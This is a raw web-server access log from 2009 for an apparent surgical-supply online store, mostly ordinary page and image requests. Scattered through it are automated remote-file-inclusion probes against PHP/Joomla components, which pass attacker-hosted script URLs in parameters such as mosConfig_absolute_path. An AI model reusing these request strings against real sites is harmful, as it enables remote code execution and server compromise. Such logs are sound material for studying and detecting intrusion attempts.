88.241.157.114 - - [23/Sep/2009:08:03:41 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01238E441AE837009BD7054+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.241.157.114 - - [23/Sep/2009:08:03:41 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01238E441AE837009BD7054+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.241.157.114 - - [23/Sep/2009:08:03:41 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01238E441AE837009BD7054+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.241.157.114 - - [23/Sep/2009:08:03:41 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01238E441AE837009BD7054+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.241.157.114 - - [23/Sep/2009:08:03:41 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01238E441AE837009BD7054+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.241.157.114 - - [23/Sep/2009:08:03:44 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.0" 200 76380 "http://209.85.129.132/search?q=cache:fQhG6JKEMlQJ:www.acesurgical.com/scrapers.html+steigman+bone+scrapers&cd=1&hl=tr&ct=clnk&gl=tr" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.101.214.54 - - [23/Sep/2009:08:04:02 -0400] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:04:02 -0400] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:04:02 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:04:03 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:04:03 -0400] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:04:03 -0400] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
64.221.88.162 - - [23/Sep/2009:08:04:04 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:04:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:04:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:04:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
172.16.1.96 - - [23/Sep/2009:08:04:19 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:08:04:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:08:04:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.74 - - [23/Sep/2009:08:05:22 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.74 - - [23/Sep/2009:08:05:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.74 - - [23/Sep/2009:08:05:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
121.101.214.54 - - [23/Sep/2009:08:05:37 -0400] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:05:40 -0400] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:05:40 -0400] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:05:40 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:05:48 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:05:48 -0400] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:05:48 -0400] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:08:06:03 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:08:06:03 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:08:06:03 -0400] "GET /logs/error_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
172.16.1.96 - - [23/Sep/2009:08:06:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:08:06:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:08:06:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.72.216 - - [23/Sep/2009:08:06:05 -0400] "GET /logs/error_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:08:06:05 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.101.214.54 - - [23/Sep/2009:08:06:21 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:08:06:21 -0400] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:06:26 -0400] "GET /logs/phphtml.php?htmlclass_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:06:26 -0400] "GET /phphtml.php?htmlclass_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:08:06:26 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:08:06:31 -0400] "GET /logs/error_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:08:06:31 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:08:06:31 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:08:06:33 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
61.100.5.136 - - [23/Sep/2009:08:06:39 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.221.88.162 - - [23/Sep/2009:08:07:00 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:07:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:07:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [23/Sep/2009:08:07:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
172.16.1.74 - - [23/Sep/2009:08:07:39 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.74 - - [23/Sep/2009:08:07:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.74 - - [23/Sep/2009:08:07:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Sep/2009:08:08:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.193.162.46 - - [23/Sep/2009:08:08:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
211.39.130.24 - - [23/Sep/2009:08:08:25 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:08:08:25 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
172.16.1.67 - - [23/Sep/2009:08:08:30 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.67 - - [23/Sep/2009:08:08:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.67 - - [23/Sep/2009:08:08:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
24.193.162.46 - - [23/Sep/2009:08:08:31 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 73513 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:32 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 30054 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.193.162.46 - - [23/Sep/2009:08:08:33 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
211.39.130.24 - - [23/Sep/2009:08:08:34 -0400] "GET /logs/access_log.Q109082800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:08:08:34 -0400] "GET /logs/access_log.Q109082500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
24.193.162.46 - - [23/Sep/2009:08:08:36 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
195.238.0.90 - - [23/Sep/2009:08:08:41 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
